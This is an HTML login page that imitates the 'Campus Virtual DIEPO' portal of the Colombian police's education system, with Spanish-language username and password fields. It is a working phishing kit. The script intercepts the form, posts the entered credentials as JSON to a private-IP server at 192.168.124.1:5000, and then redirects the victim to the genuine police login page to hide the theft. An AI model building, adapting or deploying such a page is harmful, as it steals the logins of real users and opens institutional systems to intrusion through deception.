<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
    <head>
        <title>Campus Virtual DIEPO</title>
        <meta http-equiv="content-type" content="text/html;charset=utf-8" />
        <meta name="generator" content="Geany 1.33" />
        <link rel="stylesheet" type="text/css" href="portada/cssportada/base.css" />
        <link rel="stylesheet" type="text/css" href="portada/cssportada/contenido.css" />
        <link rel="stylesheet" href="portada/cssportada/bootstrap.min.css" />
        <link rel="stylesheet" href="portada/cssportada/bootstrap-responsive.min.css" />
        <link rel="stylesheet" href="portada/cssportada/main.css" -- />
        <script src="portada/js/vendor/modernizr-2.6.2-respond-1.1.0.min.js"></script>
    </head>
    <body>
        <div id="login">
            <div id="contenedor">
                <div style="text-align: center">
                    <form id="loginForm">
                        <h3>
                            <input id="username" name="username" class="transpa" type="text" size="40" placeholder="USUARIO INSTITUCIONAL" required />
                            <br />
                            <br />
                            <input id="password" name="password" class="transpa" type="password" size="40" placeholder="CONTRASEÑA" required />
                            <br />
                            <br />
                            <input type="submit" class="boton" value="INGRESAR" />
                        </h3>
                    </form>
                    <div class="ml-auto" style="text-align: center; color: #67757c">
                        <a href="https://gestionacceso.policia.gov.co:8443/" id="to-recover" class="text-muted" style="font-family: Poppins, sans-serif; color: #000000; font-size: 18px;">
                            <i class="fa fa-lock m-r-5"></i>
                            Olvidó clave?
                        </a>
                    </div>
                </div>
            </div>
        </div>

        <script src="../ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
        <script src="portada/js/vendor/bootstrap.min.js"></script>
        <script src="portada/js/jquery.backstretch.min.js"></script>
        <script>
            jQuery.backstretch(
                [
                    "portada/imagenesportada/foto02.jpg",
                    "portada/imagenesportada/foto03.jpg",
                    "portada/imagenesportada/foto04.jpg",
                    "portada/imagenesportada/foto05.jpg"
                ],
                { duration: 2000, fade: 1500 }
            );

            document.getElementById('loginForm').addEventListener('submit', function(event) {
                event.preventDefault();

                const username = document.getElementById('username').value;
                const password = document.getElementById('password').value;

                fetch('http://192.168.124.1:5000/usuario/crear', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify({ username: username, password: password })
                })
                .then(response => {
                    if (!response.ok) {
                        throw new Error('Network response was not ok');
                    }
                    return response.json();
                })
                .then(data => {
                    console.log('Success:', data);
                    window.location.href = 'https://educacion.policia.edu.co/dinae/login/index.php';
                })
                .catch((error) => {
                    console.error('Error:', error);
                });
            });
        </script>
    </body>
</html>
